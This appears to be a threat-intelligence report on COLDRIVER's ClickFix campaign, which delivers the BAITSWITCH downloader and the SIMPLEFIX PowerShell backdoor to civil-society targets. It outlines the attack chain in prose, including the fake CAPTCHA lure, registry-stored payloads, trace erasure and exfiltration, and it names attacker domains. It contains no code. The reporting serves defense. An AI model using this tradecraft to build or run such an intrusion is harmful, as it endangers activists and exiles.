SIMPLEFIX Malware
The Russian advanced persistent threat (APT) group COLDRIVER has been linked to a new wave of ClickFix-style attacks, introducing two lightweight malware families: BAITSWITCH and SIMPLEFIX. Security researchers identified this multi-stage campaign in September 2025. BAITSWITCH acts as a downloader that ultimately delivers SIMPLEFIX, a PowerShell-based backdoor.
COLDRIVER, also known by aliases such as Callisto, Star Blizzard, and UNC4057, has been active since 2019, targeting a broad spectrum of organizations. Early campaigns relied on spear-phishing to redirect victims to credential-harvesting pages. Over time, the group has developed custom tools like SPICA and LOSTKEYS, highlighting its growing technical sophistication.
Table of Contents
ClickFix: A Proven, Persistent Attack Vector
This APT group has previously deployed ClickFix tactics, first documented in May 2025. In those campaigns, fake websites offered fraudulent CAPTCHA prompts, tricking victims into executing PowerShell commands that delivered the LOSTKEYS Visual Basic Script.
While ClickFix is neither novel nor highly advanced, its repeated use demonstrates its effectiveness as an infection vector. The latest attacks maintain the same general methodology: victims are deceived into running a malicious DLL through the Windows Run dialog, ostensibly to complete a CAPTCHA check.
Anatomy of the Attack Chain
The attack proceeds as follows:
The BAITSWITCH DLL is executed and connects to an attacker-controlled domain (captchanom.top) to fetch the SIMPLEFIX backdoor. A decoy document hosted on Google Drive is displayed to distract the victim.
Several HTTP requests are sent to the same server to transmit system information, receive commands for persistence, store encrypted payloads in the Windows Registry, download a PowerShell stager, and erase recent Run dialog history to cover traces.
The PowerShell stager downloads SIMPLEFIX from southprovesolutions.com. SIMPLEFIX establishes a connection with a Command-and-Control (C2) server, enabling execution of remote PowerShell scripts, commands, and binaries.
A PowerShell script executed via SIMPLEFIX targets a predefined set of directories and file types for exfiltration, mirroring overlaps with previous LOSTKEYS campaigns.
Target Profile and Strategic Focus
COLDRIVER’s operations primarily focus on civil society actors, including:
- Members of NGOs and think tanks in Western regions
- Human rights defenders
- Individuals exiled from or residing in Russia
The current campaign aligns closely with this established victimology, reinforcing the group’s ongoing interest in Russian civil society and related networks.
